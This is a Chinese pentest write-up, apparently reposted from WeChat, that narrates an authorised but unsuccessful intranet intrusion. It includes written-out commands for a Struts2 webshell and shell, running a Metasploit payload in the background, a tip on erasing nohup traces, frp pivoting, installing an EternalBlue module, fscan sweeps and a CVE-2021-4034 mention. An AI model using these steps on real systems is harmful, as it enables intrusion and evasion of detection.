来自本群村サメマル的投稿 感觉很可以 大家一起学习下,注本次渗透都是在有授权的情况实现,切勿乱来
开局一张图
测了下弱口令、扫了扫目录,正准备切换下一个的时候,漏扫返回结果,存在一个strust2 的文件上传和rce那就上传我的马子马子上传成功,顺便弹了一波shell,马子连的时间有点儿长,那就先弹到shell操作一波
试试弱口令,在这儿,是属于标准输入输出,想得到一个交互的shell ,那就得有一个tty
python -c 'import pty;pty.1 spawn("/bin/sh")'
这样就是一个tty 终端了
常规的信息收集一波
这时候看了下,马子连接成功
顺便扫一下内网
卧槽,,这么多???先试着提权,msf生成elf马子,wget远程上传为了使命令行重复使用不浪费,这里可以直接后台运行
setsid ./.shell.elf &
#或者
nohup ./.shell.elf &
#nohup会生成一个out输出文件,还得去擦屁股
multi/handle 上线msf挂起使用模块exploit_suggester
直接搭建frp 进入内网首先找到可操作的目录
find /home -name tomcat
进入有执行权限的目录,远程下载frpc 和文件frpc.ini,我真的是服了这个老六了,需要自己配置最大连接数,不然你用脚本扫直接给你扫宕,不对,不止是漏扫,就是burp访问也卡的鸭批
扫内网
好家伙,有ms17-010 ?直接上家伙,
设置路由就开始攻击好家伙, x86 的, msf 只有64bit 的,怎么能放弃呢?说不定能直接上线cs 呢,现在这个情况就是,代理一下流量直接打,那就添加一下路由,然后设置那个内网的ip
解决办法:
dpkg --add-architecture i386 && apt-get update && apt-get install wine32
wine cmd.exe
然后下载x32 的包
git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-
Metasploit.git && cd Eternalblue-Doublepulsar-Metasploit/ && cp
eternalblue_doublepulsar.rb /opt/metasploitframework/
embedded/framework/modules/exploits/windows/smb/
在msfconsole 这儿输入reload_all
现在使用这个模块:exploit/windows/smb/eternalblue_doublepulsar
设置一下set processinject explorer.exe
直接run
操!有防火墙
唧唧
扫了一下内网的所有端口,不得不说, fscan yyds
echo "./fscan -h 192.168.40.0/24 -p 1-65535 > res.txt && mv res.txt
../docs" > start.sh
chmod +x start.sh
setsid ./start.sh &
喝点儿茶,过会儿去访问http://admin.xxx.xx/docs/res.txt
找到一个win sql server 的web界面登录
但是无法执行xp_cmdshell()
找到个提权点
好家伙,cve-2021-4034
嘿嘿猪队友实锤
快乐直接没了
后续还发现了内网一些服务 比如solr ,上传个自己写的脚本:
没洞
结算
特别声明:
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,我不为此承担任何责任。
作者有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经作者的允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。切勿用于非法,仅供学习参考
我不会渗透,我们下次再见!
原文始发于微信公众号(深夜笔记本):一次不成功的内网渗透
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论